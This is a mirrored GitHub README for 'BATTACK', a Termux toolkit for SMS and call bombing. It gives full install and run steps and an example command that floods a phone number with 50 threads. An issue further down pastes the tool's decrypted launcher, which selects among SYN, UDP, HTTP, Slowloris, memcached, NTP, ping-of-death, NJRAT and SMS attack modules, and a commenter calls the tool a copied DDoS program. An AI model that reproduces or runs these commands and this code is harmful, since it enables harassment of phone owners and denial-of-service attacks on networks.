GithubHelp home page GithubHelp logo

battack's Introduction

BATTACK v1.0

SMS BOMBING & CALL BOMBING TOOL FOR TERMUX USERS

About Battack:

BATTACK is a python based Toolkit. This is a set of tools to provide denial of service attacks. BATTACK is a SMS Bombing Toolkit. This tool works on both rooted Android device and Non-rooted Android device.

Installation :

$ pkg update && pkg upgrade
$ pkg install python
$ pkg install python2
$ pkg install git
$ pkg install pip
$ pkg install pip2
$ pip2 install requests
$ pip2 install mechanize
$ git clone https://github.com/botolvau/battack

Tools Run :

$ ls && cd battack && ls
$ chmod +x *
$ pip install -r requirements.txt
$ python2 battack.py

Battack Using :

$ cd battack
$ ls
$ python2 battack.py

> EXAMPLES OF SMS BOMBING
    
$ botol --tool SMS --target +8801711111111 --timeout 10 --threads 50

TOOLS NOT RUNNING ? FOLLOW THIS :

> cd $HOME
> ls
> cp -r battack /data/data/com.termux/files/usr/bin
> cd /data/data/com.termux/files/usr/bin/battack
> ls
> pip install -r requirements.txt
> python2 battack.py

NOW WORKING WITHOUT ANY PROBLEM :-)

VIDEO TUTORIAL & PASSWORD

Watch the video

BATTACK Toolkit Disclaimer

Usage of the BATTACK Toolkit for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

BATTACK Toolkit License

MIT License

Copyright (C) 2020, BotolMehedi. All Rights Reserved.

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

battack's People

Contributors

botolmehedi avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

battack's Issues

Copyright Infringement

This tool is just a copy of another Ddos tool called quack
You just changed the logo/banner
And encrypted its main codes
I just decrypted it to confirm,
And here is your encrypted codes !!

coding=utf-8

#!/usr/bin/env python3

import os

os.system("printf '\033]2;BATTACK Toolkit\a'")

import argparse
import sys
import signal

def signal_handler(signal, frame):
A = '\033[1;33m'
W = '\033[0m'
E = '\033[0m'
print(A+'\n[!]'+W+' Attack terminated.'+E)
os._exit(0)

os.system("clear")
print("")
os.system("cat tools/addons/banner.txt")
print("")
print("")
print("")

def main():
parser = argparse.ArgumentParser()
parser.add_argument("--target", type = str, metavar = "",
help = "Type Mobile Number")
parser.add_argument("--tool", type = str, metavar = "",
help = "Select SMS")
parser.add_argument("--timeout", type = int, default = 10, metavar = "",
help = "Timeout in seconds.")
parser.add_argument("--threads", type = int, default = 3, metavar = "",
help = "Total Send.")
parser.add_argument("--update", action='store_true', dest="update", help = "Update BATTACK Toolkit.")
parser.add_argument("--version", action='store_true', dest="version", help = "Show BATTACK Toolkt version.")

# Get args
args = parser.parse_args()
threads = args.threads
time = args.timeout
method = str(args.tool).upper()
target = args.target

if method == "NTP":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.ntp import NTP_ATTACK
	NTP_ATTACK(threads, time, target)
	
elif args.update:
	os.system("chmod +x bin/battack && bin/battack -u")
	sys.exit()

elif args.version:
	print("")
	os.system("cat tools/addons/banner.txt")
	print("")
	print("BATTACK Toolkit v2.0")
	sys.exit()

elif method == "SYN":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.syn import SYN_ATTACK
	SYN_ATTACK(threads, time, target)

elif method == "TCP":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.tcp import TCP_ATTACK
	TCP_ATTACK(threads, time, target)

elif method == "POD":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.pod import POD_ATTACK
	POD_ATTACK(threads, time, target)

elif method == "NJRAT":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.njrat import NJRAT_ATTACK
	NJRAT_ATTACK(threads, time, target)

elif method == "UDP":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.udp import UDP_ATTACK
	UDP_ATTACK(threads, time, target)

elif method == "HTTP":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.http import HTTP_ATTACK
	HTTP_ATTACK(threads, time, target)

elif method == "SLOWLORIS":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.slowloris import SLOWLORIS_ATTACK
	SLOWLORIS_ATTACK(threads, time, target)

elif method == "MEMCACHED":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.other.memcached import MEMCACHED_ATTACK
	MEMCACHED_ATTACK(threads, time, target)

elif method == "SMS":
	signal.signal(signal.SIGINT, signal_handler)
	import tools.addons.clean
	import tools.addons.logo
	from tools.SMS.main import SMS_ATTACK
	SMS_ATTACK(threads, time, target)

else:
	parser.print_help()

if name == 'main':
main()

Help

The username and password indicates that they were removed, what are the new keys

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.